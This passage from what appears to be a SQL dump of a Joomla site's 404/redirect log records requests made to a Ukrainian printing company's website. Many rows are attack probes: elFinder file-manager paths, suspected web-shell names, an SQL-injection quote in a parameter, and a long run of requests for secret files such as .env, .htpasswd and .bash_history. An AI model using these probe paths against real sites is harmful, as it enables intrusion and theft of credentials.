00:00:00',301),(3517,'http://ekvatorprint.com.ua/media/jui/js/===c?(b.parentNode&&(b.outerHTML=a.outerHTML),l.html5Clone&&a.innerHTML&&!n.trim(b.innerHTML)&&(b.innerHTML=a.innerHTML)):',NULL,'','',1,0,'2017-01-12 12:48:24','0000-00-00 00:00:00',301),(3518,'http://ekvatorprint.com.ua/plugins/system/jcemediabox/js/\'+this.active.src+\'',NULL,'','',1,0,'2017-01-12 12:48:27','0000-00-00 00:00:00',301),(3519,'http://ekvatorprint.com.ua/https:/mc.yandex.ru/watch/39121055',NULL,'','',3,0,'2017-01-12 12:48:27','0000-00-00 00:00:00',301),(3520,'http://ekvatorprint.com.ua/plugins/system/jcemediabox/js/\"+bg+\"',NULL,'','',1,0,'2017-01-12 12:48:29','0000-00-00 00:00:00',301),(3521,'http://ekvatorprint.com.ua/plugins/system/jcemediabox/js/\"+s+\"',NULL,'','',1,0,'2017-01-12 12:48:29','0000-00-00 00:00:00',301),(3522,'http://ekvatorprint.com.ua/plugins/system/jcemediabox/js/\'+resolveMediaPath(poster)+\'',NULL,'','',1,0,'2017-01-12 12:48:31','0000-00-00 00:00:00',301),(3523,'http://ekvatorprint.com.ua/plugins/system/jcemediabox/js/\'+url+\'',NULL,'','',1,0,'2017-01-12 12:48:31','0000-00-00 00:00:00',301),(3524,'http://ekvatorprint.com.ua/banner-printing/https:/mc.yandex.ru/watch/39121055',NULL,'','',1,0,'2017-01-12 12:48:32','0000-00-00 00:00:00',301),(3525,'http://ekvatorprint.com.ua/banner-printing/https:/ru.wikipedia.org/wiki/???',NULL,'','',1,0,'2017-01-12 12:48:33','0000-00-00 00:00:00',301),(3526,'http://ekvatorprint.com.ua/contacts/https:/mc.yandex.ru/watch/39121055',NULL,'','',1,0,'2017-01-12 12:48:34','0000-00-00 00:00:00',301),(3527,'http://ekvatorprint.com.ua/delivery/https:/mc.yandex.ru/watch/39121055',NULL,'','',1,0,'2017-01-12 12:48:35','0000-00-00 00:00:00',301),(3528,'http://ekvatorprint.com.ua/equipment/https:/mc.yandex.ru/watch/39121055',NULL,'','',1,0,'2017-01-12 12:48:36','0000-00-00 00:00:00',301),(3529,'http://ekvatorprint.com.ua/modulnye-kartiny/https:/mc.yandex.ru/watch/39121055',NULL,'','',1,0,'2017-01-12 12:48:37','0000-00-00 00:00:00',301),(3530,'http://ekvatorprint.com.ua/outdoor-advertising/https:/mc.yandex.ru/watch/39121055',NULL,'','',1,0,'2017-01-12 12:48:37','0000-00-00 00:00:00',301),(3531,'http://ekvatorprint.com.ua/plotternaya-podrezka/https:/mc.yandex.ru/watch/39121055',NULL,'','',1,0,'2017-01-12 12:48:38','0000-00-00 00:00:00',301),(3532,'http://ekvatorprint.com.ua/price/https:/mc.yandex.ru/watch/39121055',NULL,'','',1,0,'2017-01-12 12:48:39','0000-00-00 00:00:00',301),(3533,'http://ekvatorprint.com.ua/print-billboards/https:/mc.yandex.ru/watch/39121055',NULL,'','',1,0,'2017-01-12 12:48:40','0000-00-00 00:00:00',301),(3534,'http://ekvatorprint.com.ua/print-citylights/https:/mc.yandex.ru/watch/39121055',NULL,'','',1,0,'2017-01-12 12:48:41','0000-00-00 00:00:00',301),(3535,'http://ekvatorprint.com.ua/print-flags/https:/mc.yandex.ru/watch/39121055',NULL,'','',1,0,'2017-01-12 12:48:42','0000-00-00 00:00:00',301),(3536,'http://ekvatorprint.com.ua/print-great-photos/https:/mc.yandex.ru/watch/39121055',NULL,'','',1,0,'2017-01-12 12:48:42','0000-00-00 00:00:00',301),(3537,'http://ekvatorprint.com.ua/print-photo/https:/mc.yandex.ru/watch/39121055',NULL,'','',1,0,'2017-01-12 12:48:43','0000-00-00 00:00:00',301),(3538,'http://ekvatorprint.com.ua/printing-on-an-awning/https:/mc.yandex.ru/watch/39121055',NULL,'','',1,0,'2017-01-12 12:48:44','0000-00-00 00:00:00',301),(3539,'http://ekvatorprint.com.ua/printing-on-canvas/https:/mc.yandex.ru/watch/39121055',NULL,'','',1,0,'2017-01-12 12:48:45','0000-00-00 00:00:00',301),(3540,'http://ekvatorprint.com.ua/printing-on-canvas/https:/www.youtube.com/embed/T99VXHKSQJY',NULL,'','',1,0,'2017-01-12 12:48:46','0000-00-00 00:00:00',301),(3541,'http://ekvatorprint.com.ua/printing-on-the-grid/https:/mc.yandex.ru/watch/39121055',NULL,'','',1,0,'2017-01-12 12:48:46','0000-00-00 00:00:00',301),(3542,'http://ekvatorprint.com.ua/printing-on-vinyl/https:/mc.yandex.ru/watch/39121055',NULL,'','',1,0,'2017-01-12 12:48:47','0000-00-00 00:00:00',301),(3543,'http://ekvatorprint.com.ua/trebovaniya/https:/mc.yandex.ru/watch/39121055',NULL,'','',1,0,'2017-01-12 12:48:49','0000-00-00 00:00:00',301),(3544,'http://ekvatorprint.com.ua/trebovaniya/https:/www.youtube.com/embed/KbMdSqMLzuU',NULL,'','',1,0,'2017-01-12 12:48:49','0000-00-00 00:00:00',301),(3545,'http://ekvatorprint.com.ua/trebovaniya/https:/www.youtube.com/embed/WdfNRTw1nlw',NULL,'','',1,0,'2017-01-12 12:48:50','0000-00-00 00:00:00',301),(3546,'http://ekvatorprint.com.ua/video/https:/mc.yandex.ru/watch/39121055',NULL,'','',1,0,'2017-01-12 12:48:51','0000-00-00 00:00:00',301),(3547,'http://ekvatorprint.com.ua/printing-in-dnepropetrovsk/https:/mc.yandex.ru/watch/39121055',NULL,'','',1,0,'2017-01-12 12:48:54','0000-00-00 00:00:00',301),(3548,'http://ekvatorprint.com.ua/printing-in-kharkov/https:/mc.yandex.ru/watch/39121055',NULL,'','',1,0,'2017-01-12 12:48:55','0000-00-00 00:00:00',301),(3549,'http://ekvatorprint.com.ua/printing-in-kyiv/https:/mc.yandex.ru/watch/39121055',NULL,'','',1,0,'2017-01-12 12:48:56','0000-00-00 00:00:00',301),(3550,'http://ekvatorprint.com.ua/printing-in-odessa/https:/mc.yandex.ru/watch/39121055',NULL,'','',1,0,'2017-01-12 12:48:56','0000-00-00 00:00:00',301),(3551,'http://ekvatorprint.com.ua/printing-in-zaporozhje/https:/mc.yandex.ru/watch/39121055',NULL,'','',1,0,'2017-01-12 12:48:57','0000-00-00 00:00:00',301),(3552,'http://ekvatorprint.com.ua/internet-katalog-modulnykh-kartin/https:/mc.yandex.ru/watch/39121055',NULL,'','',1,0,'2017-01-12 12:48:58','0000-00-00 00:00:00',301),(3553,'http://ekvatorprint.com.ua/digital-printing/https:/mc.yandex.ru/watch/39121055',NULL,'','',1,0,'2017-01-12 12:48:59','0000-00-00 00:00:00',301),(3554,'http://ekvatorprint.com.ua/plugins/system/jcemediabox/js/https:/get.adobe.com/flashplayer',NULL,'','',1,0,'2017-01-12 12:49:01','0000-00-00 00:00:00',301),(3555,'http://ekvatorprint.com.ua/contacts/https:/api-maps.yandex.ru/services/constructor/1.0/js/?sid=bD-oTN_62vhvaCsKWdU_fg2pzLOFLsrS&width=721&height=428&lang=ru_UA&sourceType=constructor&scroll=true',NULL,'','',1,0,'2017-01-12 12:49:02','0000-00-00 00:00:00',301),(3556,'http://ekvatorprint.com.ua/index.php?category_id=\'&Itemid=135&option=com_jak2filter&searchword=the&view=itemlist&xf_2=5',NULL,'','',1,0,'2017-01-12 22:36:10','0000-00-00 00:00:00',301),(3557,'http://ekvatorprint.com.ua/images/modulnie kartini/',NULL,'','',1,0,'2017-01-13 01:13:07','0000-00-00 00:00:00',301),(3558,'http://ekvatorprint.com.ua/images/svg-symbols.svg',NULL,'http://ekvatorprint.com.ua/','',1,0,'2017-01-13 16:01:28','0000-00-00 00:00:00',301),(3559,'http://ekvatorprint.com.ua/libraries/cms/modules.php',NULL,'http://ekvatorprint.com.ua/libraries/cms/modules.php','',1,0,'2017-01-13 16:25:12','0000-00-00 00:00:00',301),(3560,'http://ekvatorprint.com.ua/webalizer/',NULL,'http://ekvatorprint.com.ua/webalizer/','',1,0,'2017-01-14 13:21:03','0000-00-00 00:00:00',301),(3561,'http://ekvatorprint.com.ua/wall_login.php?login=cmd',NULL,'','',1,0,'2017-01-14 20:05:20','0000-00-00 00:00:00',301),(3562,'http://ekvatorprint.com.ua/m/print-flags',NULL,'','',2,0,'2017-01-15 04:25:52','0000-00-00 00:00:00',301),(3563,'http://ekvatorprint.com.ua/print-ptorprint.com.ua/',NULL,'','',1,0,'2017-01-15 09:14:51','0000-00-00 00:00:00',301),(3564,'http://ekvatorprint.com.ua/mobile/contacts',NULL,'','',2,0,'2017-01-15 11:50:49','0000-00-00 00:00:00',301),(3565,'http://ekvatorprint.com.ua/mobile/banner-printing',NULL,'','',1,0,'2017-01-16 00:06:59','0000-00-00 00:00:00',301),(3566,'http://ekvatorprint.com.ua/internet-katalog-modulnykh-kartinдавай',NULL,'http://vk.com/away.php','',4,0,'2017-01-16 10:36:52','0000-00-00 00:00:00',301),(3567,'http://ekvatorprint.com.ua/backoffice/js/texteditor/elfinder/elfinder.html',NULL,'','',2,0,'2017-01-16 20:00:59','0000-00-00 00:00:00',301),(3568,'http://ekvatorprint.com.ua/tiny_mce/plugins/elfinder/elfinder.html',NULL,'','',1,0,'2017-01-16 20:01:00','0000-00-00 00:00:00',301),(3569,'http://ekvatorprint.com.ua/administrator/components/com_akquickicons/includes/elfinder/elfinder.html',NULL,'','',1,0,'2017-01-16 20:01:00','0000-00-00 00:00:00',301),(3570,'http://ekvatorprint.com.ua/erfurt/administrator/components/com_akquickicons/includes/elfinder/elfinder.html',NULL,'','',1,0,'2017-01-16 20:01:00','0000-00-00 00:00:00',301),(3571,'http://ekvatorprint.com.ua/erfurt/erfurt/administrator/components/com_akquickicons/includes/elfinder/elfinder.html',NULL,'','',1,0,'2017-01-16 20:01:00','0000-00-00 00:00:00',301),(3572,'http://ekvatorprint.com.ua/erfurt/gotha/administrator/components/com_akquickicons/includes/elfinder/elfinder.html',NULL,'','',1,0,'2017-01-16 23:50:45','0000-00-00 00:00:00',301),(3573,'http://ekvatorprint.com.ua/gotha/erfurt/administrator/components/com_akquickicons/includes/elfinder/elfinder.html',NULL,'','',1,0,'2017-01-16 23:50:46','0000-00-00 00:00:00',301),(3574,'http://ekvatorprint.com.ua/gotha/administrator/components/com_akquickicons/includes/elfinder/elfinder.html',NULL,'','',1,0,'2017-01-16 23:50:46','0000-00-00 00:00:00',301),(3575,'http://ekvatorprint.com.ua/gotha/gotha/administrator/components/com_akquickicons/includes/elfinder/elfinder.html',NULL,'','',1,0,'2017-01-16 23:50:46','0000-00-00 00:00:00',301),(3576,'http://ekvatorprint.com.ua/backup/preview_1/admin/elfinder/elfinder.html',NULL,'','',1,0,'2017-01-16 23:50:46','0000-00-00 00:00:00',301),(3577,'http://ekvatorprint.com.ua/component/content//images/stories/magic.php.png',NULL,'','',1,0,'2017-01-17 10:07:14','0000-00-00 00:00:00',301),(3578,'http://ekvatorprint.com.ua/templates/jtemplate/j1template.php',NULL,'ekvatorprint.com.ua','',15,0,'2017-01-17 10:49:23','0000-00-00 00:00:00',301),(3579,'http://ekvatorprint.com.ua/templates/jtemplate/jtemplate.php',NULL,'ekvatorprint.com.ua','',15,0,'2017-01-17 10:49:40','0000-00-00 00:00:00',301),(3580,'http://ekvatorprint.com.ua/images/jlogo.php',NULL,'ekvatorprint.com.ua','',16,0,'2017-01-17 10:49:49','0000-00-00 00:00:00',301),(3581,'http://ekvatorprint.com.ua/backup/preview_2/admin/elfinder/elfinder.html',NULL,'','',1,0,'2017-01-17 10:51:09','0000-00-00 00:00:00',301),(3582,'http://ekvatorprint.com.ua/backup/preview_Jan27/admin/elfinder/elfinder.html',NULL,'','',1,0,'2017-01-17 10:51:10','0000-00-00 00:00:00',301),(3583,'http://ekvatorprint.com.ua/backup/preview_Jan9/admin/elfinder/elfinder.html',NULL,'','',1,0,'2017-01-17 10:51:10','0000-00-00 00:00:00',301),(3584,'http://ekvatorprint.com.ua/backup/preview_problem/admin/elfinder/elfinder.html',NULL,'','',1,0,'2017-01-17 10:51:10','0000-00-00 00:00:00',301),(3585,'http://ekvatorprint.com.ua/preview/admin/elfinder/elfinder.html',NULL,'','',1,0,'2017-01-17 10:51:11','0000-00-00 00:00:00',301),(3586,'http://ekvatorprint.com.ua/templates/j2template/j2template.php',NULL,'ekvatorprint.com.ua','',15,0,'2017-01-17 10:52:21','0000-00-00 00:00:00',301),(3587,'http://ekvatorprint.com.ua/modules/mod_jmodule/mod_j1module.php',NULL,'ekvatorprint.com.ua','',15,0,'2017-01-17 10:53:12','0000-00-00 00:00:00',301),(3588,'http://ekvatorprint.com.ua/forum.php',NULL,'','',6,0,'2017-01-19 03:01:03','0000-00-00 00:00:00',301),(3589,'http://ekvatorprint.com.ua/index.php?option=com_content&view=article&itemid=2',NULL,'','',1,0,'2017-01-19 07:22:28','0000-00-00 00:00:00',301),(3590,'http://ekvatorprint.com.ua/wraper.php',NULL,'ekvatorprint.com.ua','',3,0,'2017-01-19 15:06:14','0000-00-00 00:00:00',301),(3591,'http://ekvatorprint.com.ua/book.php',NULL,'ekvatorprint.com.ua','',3,0,'2017-01-19 15:47:59','0000-00-00 00:00:00',301),(3592,'http://ekvatorprint.com.ua/lndex.php',NULL,'ekvatorprint.com.ua','',5,0,'2017-01-19 16:30:26','0000-00-00 00:00:00',301),(3593,'http://ekvatorprint.com.ua/shwrk.php',NULL,'ekvatorprint.com.ua','',3,0,'2017-01-19 17:13:16','0000-00-00 00:00:00',301),(3594,'http://ekvatorprint.com.ua/notlce.php',NULL,'ekvatorprint.com.ua','',3,0,'2017-01-19 17:16:14','0000-00-00 00:00:00',301),(3595,'http://ekvatorprint.com.ua/administrator/components/com_jvframework/libraries/elfinder-2.0-rc1/elfinder.html',NULL,'','',2,0,'2017-01-20 04:31:52','0000-00-00 00:00:00',301),(3596,'http://ekvatorprint.com.ua/assets/elfinder1/elfinder.html',NULL,'','',2,0,'2017-01-20 04:31:53','0000-00-00 00:00:00',301),(3597,'http://ekvatorprint.com.ua/place1/elfinder/elfinder.html',NULL,'','',2,0,'2017-01-20 04:31:53','0000-00-00 00:00:00',301),(3598,'http://ekvatorprint.com.ua/backup/elfinder/elfinder.html',NULL,'','',2,0,'2017-01-20 04:31:53','0000-00-00 00:00:00',301),(3599,'http://ekvatorprint.com.ua/erpfilemanager/elfinder.html',NULL,'','',2,0,'2017-01-20 04:31:54','0000-00-00 00:00:00',301),(3600,'http://ekvatorprint.com.ua/fonts/glyphicons-halflings-regular.woff2',NULL,'http://ekvatorprint.com.ua/css/bootstrap-3.3.5.min.css','',1,0,'2017-01-20 06:28:14','0000-00-00 00:00:00',301),(3601,'http://ekvatorprint.com.ua/fonts/glyphicons-halflings-regular.woff',NULL,'http://ekvatorprint.com.ua/css/bootstrap-3.3.5.min.css','',1,0,'2017-01-20 06:28:14','0000-00-00 00:00:00',301),(3602,'http://ekvatorprint.com.ua/js/common.js',NULL,'http://ekvatorprint.com.ua/printing-on-vinyl?gclid=CNCPueOL0NECFVuLsgodiwMNGw','',4,0,'2017-01-20 06:28:15','0000-00-00 00:00:00',301),(3603,'http://ekvatorprint.com.ua/js/bootstrap-3.3.5.min.js',NULL,'http://ekvatorprint.com.ua/printing-on-vinyl?gclid=CNCPueOL0NECFVuLsgodiwMNGw','',2,0,'2017-01-20 06:28:15','0000-00-00 00:00:00',301),(3604,'http://ekvatorprint.com.ua/js/timer.js',NULL,'http://ekvatorprint.com.ua/printing-on-vinyl?gclid=CNCPueOL0NECFVuLsgodiwMNGw','',2,0,'2017-01-20 06:28:15','0000-00-00 00:00:00',301),(3605,'http://ekvatorprint.com.ua/img/volia_300.png',NULL,'http://ekvatorprint.com.ua/printing-on-vinyl?gclid=CNCPueOL0NECFVuLsgodiwMNGw','',3,0,'2017-01-20 06:28:15','0000-00-00 00:00:00',301),(3606,'http://ekvatorprint.com.ua/fonts/glyphicons-halflings-regular.ttf',NULL,'http://ekvatorprint.com.ua/css/bootstrap-3.3.5.min.css','',1,0,'2017-01-20 06:28:15','0000-00-00 00:00:00',301),(3607,'http://ekvatorprint.com.ua/отзив',NULL,'','',1,0,'2017-01-20 12:24:58','0000-00-00 00:00:00',301),(3608,'http://ekvatorprint.com.ua/GoL0HbAhhUE8',NULL,'','',1,0,'2017-01-20 13:26:19','0000-00-00 00:00:00',301),(3609,'http://ekvatorprint.com.ua/ouEsyTWHgq9z/',NULL,'','',1,0,'2017-01-20 13:26:19','0000-00-00 00:00:00',301),(3610,'http://ekvatorprint.com.ua/RQIzJGMUMEhP.php',NULL,'','',1,0,'2017-01-20 13:26:19','0000-00-00 00:00:00',301),(3611,'http://ekvatorprint.com.ua/K1HTtHOi0pDh.',NULL,'','',1,0,'2017-01-20 13:26:19','0000-00-00 00:00:00',301),(3612,'http://ekvatorprint.com.ua/!.gitignore',NULL,'','',1,0,'2017-01-20 13:26:19','0000-00-00 00:00:00',301),(3613,'http://ekvatorprint.com.ua/.AppleDouble',NULL,'','',1,0,'2017-01-20 13:26:19','0000-00-00 00:00:00',301),(3614,'http://ekvatorprint.com.ua/.CSV',NULL,'','',1,0,'2017-01-20 13:26:20','0000-00-00 00:00:00',301),(3615,'http://ekvatorprint.com.ua/.CVS',NULL,'','',1,0,'2017-01-20 13:26:20','0000-00-00 00:00:00',301),(3616,'http://ekvatorprint.com.ua/.DS_Store',NULL,'','',8,0,'2017-01-20 13:26:20','0000-00-00 00:00:00',301),(3617,'http://ekvatorprint.com.ua/.FBCIndex',NULL,'','',1,0,'2017-01-20 13:26:20','0000-00-00 00:00:00',301),(3618,'http://ekvatorprint.com.ua/!.htaccess',NULL,'','',1,0,'2017-01-20 13:26:20','0000-00-00 00:00:00',301),(3619,'http://ekvatorprint.com.ua/!.htpasswd',NULL,'','',1,0,'2017-01-20 13:26:20','0000-00-00 00:00:00',301),(3620,'http://ekvatorprint.com.ua/.7z',NULL,'','',1,0,'2017-01-20 13:26:20','0000-00-00 00:00:00',301),(3621,'http://ekvatorprint.com.ua/php',NULL,'','',2,0,'2017-01-20 13:26:20','0000-00-00 00:00:00',301),(3622,'http://ekvatorprint.com.ua/?/',NULL,'','',1,0,'2017-01-20 13:26:20','0000-00-00 00:00:00',301),(3623,'http://ekvatorprint.com.ua/',NULL,'','',1,0,'2017-01-20 13:26:20','0000-00-00 00:00:00',301),(3624,'http://ekvatorprint.com.ua/.AppleDB',NULL,'','',1,0,'2017-01-20 13:26:20','0000-00-00 00:00:00',301),(3625,'http://ekvatorprint.com.ua/.LOCAL',NULL,'','',1,0,'2017-01-20 13:26:20','0000-00-00 00:00:00',301),(3626,'http://ekvatorprint.com.ua/.LSOverride',NULL,'','',1,0,'2017-01-20 13:26:21','0000-00-00 00:00:00',301),(3627,'http://ekvatorprint.com.ua/.SyncID',NULL,'','',1,0,'2017-01-20 13:26:21','0000-00-00 00:00:00',301),(3628,'http://ekvatorprint.com.ua/.Trashes',NULL,'','',1,0,'2017-01-20 13:26:21','0000-00-00 00:00:00',301),(3629,'http://ekvatorprint.com.ua/.SyncIgnore',NULL,'','',1,0,'2017-01-20 13:26:21','0000-00-00 00:00:00',301),(3630,'http://ekvatorprint.com.ua/.Trash',NULL,'','',1,0,'2017-01-20 13:26:21','0000-00-00 00:00:00',301),(3631,'http://ekvatorprint.com.ua/.addressbook',NULL,'','',1,0,'2017-01-20 13:26:21','0000-00-00 00:00:00',301),(3632,'http://ekvatorprint.com.ua/.adm',NULL,'','',1,0,'2017-01-20 13:26:21','0000-00-00 00:00:00',301),(3633,'http://ekvatorprint.com.ua/.access',NULL,'','',1,0,'2017-01-20 13:26:21','0000-00-00 00:00:00',301),(3634,'http://ekvatorprint.com.ua/.admin',NULL,'','',1,0,'2017-01-20 13:26:21','0000-00-00 00:00:00',301),(3635,'http://ekvatorprint.com.ua/.adminer.php.swp',NULL,'','',1,0,'2017-01-20 13:26:21','0000-00-00 00:00:00',301),(3636,'http://ekvatorprint.com.ua/.bak',NULL,'','',1,0,'2017-01-20 13:26:21','0000-00-00 00:00:00',301),(3637,'http://ekvatorprint.com.ua/.administration',NULL,'','',1,0,'2017-01-20 13:26:21','0000-00-00 00:00:00',301),(3638,'http://ekvatorprint.com.ua/.bash_logout',NULL,'','',1,0,'2017-01-20 13:26:21','0000-00-00 00:00:00',301),(3639,'http://ekvatorprint.com.ua/.bash_history',NULL,'','',3,0,'2017-01-20 13:26:21','0000-00-00 00:00:00',301),(3640,'http://ekvatorprint.com.ua/.bash_profile',NULL,'','',1,0,'2017-01-20 13:26:21','0000-00-00 00:00:00',301),(3641,'http://ekvatorprint.com.ua/.bash_history.php',NULL,'','',1,0,'2017-01-20 13:26:21','0000-00-00 00:00:00',301),(3642,'http://ekvatorprint.com.ua/.apdisk',NULL,'','',1,0,'2017-01-20 13:26:21','0000-00-00 00:00:00',301),(3643,'http://ekvatorprint.com.ua/.bashrc',NULL,'','',1,0,'2017-01-20 13:26:21','0000-00-00 00:00:00',301),(3644,'http://ekvatorprint.com.ua/.bashrc/',NULL,'','',1,0,'2017-01-20 13:26:21','0000-00-00 00:00:00',301),(3645,'http://ekvatorprint.com.ua/.build/',NULL,'','',1,0,'2017-01-20 13:26:21','0000-00-00 00:00:00',301),(3646,'http://ekvatorprint.com.ua/.buildpath/',NULL,'','',1,0,'2017-01-20 13:26:21','0000-00-00 00:00:00',301),(3647,'http://ekvatorprint.com.ua/.buildpath',NULL,'','',1,0,'2017-01-20 13:26:21','0000-00-00 00:00:00',301),(3648,'http://ekvatorprint.com.ua/.builds',NULL,'','',1,0,'2017-01-20 13:26:21','0000-00-00 00:00:00',301),(3649,'http://ekvatorprint.com.ua/.bundle',NULL,'','',1,0,'2017-01-20 13:26:21','0000-00-00 00:00:00',301),(3650,'http://ekvatorprint.com.ua/.bower-tmp',NULL,'','',1,0,'2017-01-20 13:26:21','0000-00-00 00:00:00',301),(3651,'http://ekvatorprint.com.ua/.bower-cache',NULL,'','',1,0,'2017-01-20 13:26:21','0000-00-00 00:00:00',301),(3652,'http://ekvatorprint.com.ua/.bower-registry',NULL,'','',1,0,'2017-01-20 13:26:21','0000-00-00 00:00:00',301),(3653,'http://ekvatorprint.com.ua/.bz2',NULL,'','',1,0,'2017-01-20 13:26:21','0000-00-00 00:00:00',301),(3654,'http://ekvatorprint.com.ua/.AppleDesktop',NULL,'','',1,0,'2017-01-20 13:26:21','0000-00-00 00:00:00',301),(3655,'http://ekvatorprint.com.ua/.bzr/README',NULL,'','',1,0,'2017-01-20 13:26:21','0000-00-00 00:00:00',301),(3656,'http://ekvatorprint.com.ua/.c9/',NULL,'','',1,0,'2017-01-20 13:26:21','0000-00-00 00:00:00',301),(3657,'http://ekvatorprint.com.ua/.c9revisions/',NULL,'','',1,0,'2017-01-20 13:26:21','0000-00-00 00:00:00',301),(3658,'http://ekvatorprint.com.ua/.cache',NULL,'','',1,0,'2017-01-20 13:26:21','0000-00-00 00:00:00',301),(3659,'http://ekvatorprint.com.ua/.capistrano/metrics',NULL,'','',1,0,'2017-01-20 13:26:21','0000-00-00 00:00:00',301),(3660,'http://ekvatorprint.com.ua/.cc-ban.txt',NULL,'','',1,0,'2017-01-20 13:26:21','0000-00-00 00:00:00',301),(3661,'http://ekvatorprint.com.ua/.capistrano',NULL,'','',1,0,'2017-01-20 13:26:21','0000-00-00 00:00:00',301),(3662,'http://ekvatorprint.com.ua/.cc-ban.txt.bak',NULL,'','',1,0,'2017-01-20 13:26:21','0000-00-00 00:00:00',301),(3663,'http://ekvatorprint.com.ua/.cfg',NULL,'','',1,0,'2017-01-20 13:26:21','0000-00-00 00:00:00',301),(3664,'http://ekvatorprint.com.ua/.classpath',NULL,'','',1,0,'2017-01-20 13:26:22','0000-00-00 00:00:00',301),(3665,'http://ekvatorprint.com.ua/.checkstyle',NULL,'','',1,0,'2017-01-20 13:26:22','0000-00-00 00:00:00',301),(3666,'http://ekvatorprint.com.ua/.cobalt/',NULL,'','',1,0,'2017-01-20 13:26:22','0000-00-00 00:00:00',301),(3667,'http://ekvatorprint.com.ua/.cobalt',NULL,'','',1,0,'2017-01-20 13:26:22','0000-00-00 00:00:00',301),(3668,'http://ekvatorprint.com.ua/.codekit-cache',NULL,'','',1,0,'2017-01-20 13:26:22','0000-00-00 00:00:00',301),(3669,'http://ekvatorprint.com.ua/.codio',NULL,'','',1,0,'2017-01-20 13:26:22','0000-00-00 00:00:00',301),(3670,'http://ekvatorprint.com.ua/.composer',NULL,'','',1,0,'2017-01-20 13:26:22','0000-00-00 00:00:00',301),(3671,'http://ekvatorprint.com.ua/.codeintel',NULL,'','',1,0,'2017-01-20 13:26:22','0000-00-00 00:00:00',301),(3672,'http://ekvatorprint.com.ua/.compile',NULL,'','',1,0,'2017-01-20 13:26:22','0000-00-00 00:00:00',301),(3673,'http://ekvatorprint.com.ua/.conf',NULL,'','',1,0,'2017-01-20 13:26:22','0000-00-00 00:00:00',301),(3674,'http://ekvatorprint.com.ua/.config.php.swp',NULL,'','',2,0,'2017-01-20 13:26:22','0000-00-00 00:00:00',301),(3675,'http://ekvatorprint.com.ua/.config',NULL,'','',2,0,'2017-01-20 13:26:22','0000-00-00 00:00:00',301),(3676,'http://ekvatorprint.com.ua/.contracts',NULL,'','',1,0,'2017-01-20 13:26:22','0000-00-00 00:00:00',301),(3677,'http://ekvatorprint.com.ua/.configuration.php.swp',NULL,'','',2,0,'2017-01-20 13:26:22','0000-00-00 00:00:00',301),(3678,'http://ekvatorprint.com.ua/.core',NULL,'','',1,0,'2017-01-20 13:26:22','0000-00-00 00:00:00',301),(3679,'http://ekvatorprint.com.ua/.cpan',NULL,'','',1,0,'2017-01-20 13:26:22','0000-00-00 00:00:00',301),(3680,'http://ekvatorprint.com.ua/.cproject',NULL,'','',1,0,'2017-01-20 13:26:22','0000-00-00 00:00:00',301),(3681,'http://ekvatorprint.com.ua/.coverage',NULL,'','',1,0,'2017-01-20 13:26:22','0000-00-00 00:00:00',301),(3682,'http://ekvatorprint.com.ua/.cshrc',NULL,'','',1,0,'2017-01-20 13:26:22','0000-00-00 00:00:00',301),(3683,'http://ekvatorprint.com.ua/.csv',NULL,'','',1,0,'2017-01-20 13:26:22','0000-00-00 00:00:00',301),(3684,'http://ekvatorprint.com.ua/.cvs',NULL,'','',1,0,'2017-01-20 13:26:22','0000-00-00 00:00:00',301),(3685,'http://ekvatorprint.com.ua/.cvsignore',NULL,'','',1,0,'2017-01-20 13:26:22','0000-00-00 00:00:00',301),(3686,'http://ekvatorprint.com.ua/.dat',NULL,'','',1,0,'2017-01-20 13:26:22','0000-00-00 00:00:00',301),(3687,'http://ekvatorprint.com.ua/.deployignore',NULL,'','',1,0,'2017-01-20 13:26:22','0000-00-00 00:00:00',301),(3688,'http://ekvatorprint.com.ua/.dev/',NULL,'','',1,0,'2017-01-20 13:26:22','0000-00-00 00:00:00',301),(3689,'http://ekvatorprint.com.ua/.domain',NULL,'','',1,0,'2017-01-20 13:26:22','0000-00-00 00:00:00',301),(3690,'http://ekvatorprint.com.ua/.cache/',NULL,'','',1,0,'2017-01-20 13:26:22','0000-00-00 00:00:00',301),(3691,'http://ekvatorprint.com.ua/.directory',NULL,'','',1,0,'2017-01-20 13:26:22','0000-00-00 00:00:00',301),(3692,'http://ekvatorprint.com.ua/.eclipse',NULL,'','',1,0,'2017-01-20 13:26:22','0000-00-00 00:00:00',301),(3693,'http://ekvatorprint.com.ua/.dump',NULL,'','',1,0,'2017-01-20 13:26:22','0000-00-00 00:00:00',301),(3694,'http://ekvatorprint.com.ua/.editorconfig',NULL,'','',1,0,'2017-01-20 13:26:22','0000-00-00 00:00:00',301),(3695,'http://ekvatorprint.com.ua/.elasticbeanstalk/',NULL,'','',1,0,'2017-01-20 13:26:22','0000-00-00 00:00:00',301),(3696,'http://ekvatorprint.com.ua/.elb',NULL,'','',1,0,'2017-01-20 13:26:23','0000-00-00 00:00:00',301),(3697,'http://ekvatorprint.com.ua/.elc',NULL,'','',1,0,'2017-01-20 13:26:23','0000-00-00 00:00:00',301),(3698,'http://ekvatorprint.com.ua/.emacs.desktop',NULL,'','',1,0,'2017-01-20 13:26:23','0000-00-00 00:00:00',301),(3699,'http://ekvatorprint.com.ua/.empty-folder',NULL,'','',1,0,'2017-01-20 13:26:23','0000-00-00 00:00:00',301),(3700,'http://ekvatorprint.com.ua/.emacs.desktop.lock',NULL,'','',1,0,'2017-01-20 13:26:23','0000-00-00 00:00:00',301),(3701,'http://ekvatorprint.com.ua/.env',NULL,'','',19,0,'2017-01-20 13:26:23','0000-00-00 00:00:00',301),(3702,'http://ekvatorprint.com.ua/.env.sample.php',NULL,'','',1,0,'2017-01-20 13:26:23','0000-00-00 00:00:00',301),(3703,'http://ekvatorprint.com.ua/.environment',NULL,'','',1,0,'2017-01-20 13:26:23','0000-00-00 00:00:00',301),(3704,'http://ekvatorprint.com.ua/.env.php',NULL,'','',1,0,'2017-01-20 13:26:23','0000-00-00 00:00:00',301),(3705,'http://ekvatorprint.com.ua/.error_log',NULL,'','',1,0,'2017-01-20 13:26:23','0000-00-00 00:00:00',301),(3706,'http://ekvatorprint.com.ua/.espressostorage',NULL,'','',1,0,'2017-01-20 13:26:23','0000-00-00 00:00:00',301),(3707,'http://ekvatorprint.com.ua/.event',NULL,'','',1,0,'2017-01-20 13:26:23','0000-00-00 00:00:00',301),(3708,'http://ekvatorprint.com.ua/.external/data',NULL,'','',1,0,'2017-01-20 13:26:23','0000-00-00 00:00:00',301),(3709,'http://ekvatorprint.com.ua/.externalToolBuilders/',NULL,'','',1,0,'2017-01-20 13:26:23','0000-00-00 00:00:00',301),(3710,'http://ekvatorprint.com.ua/.cpanel/',NULL,'','',1,0,'2017-01-20 13:26:23','0000-00-00 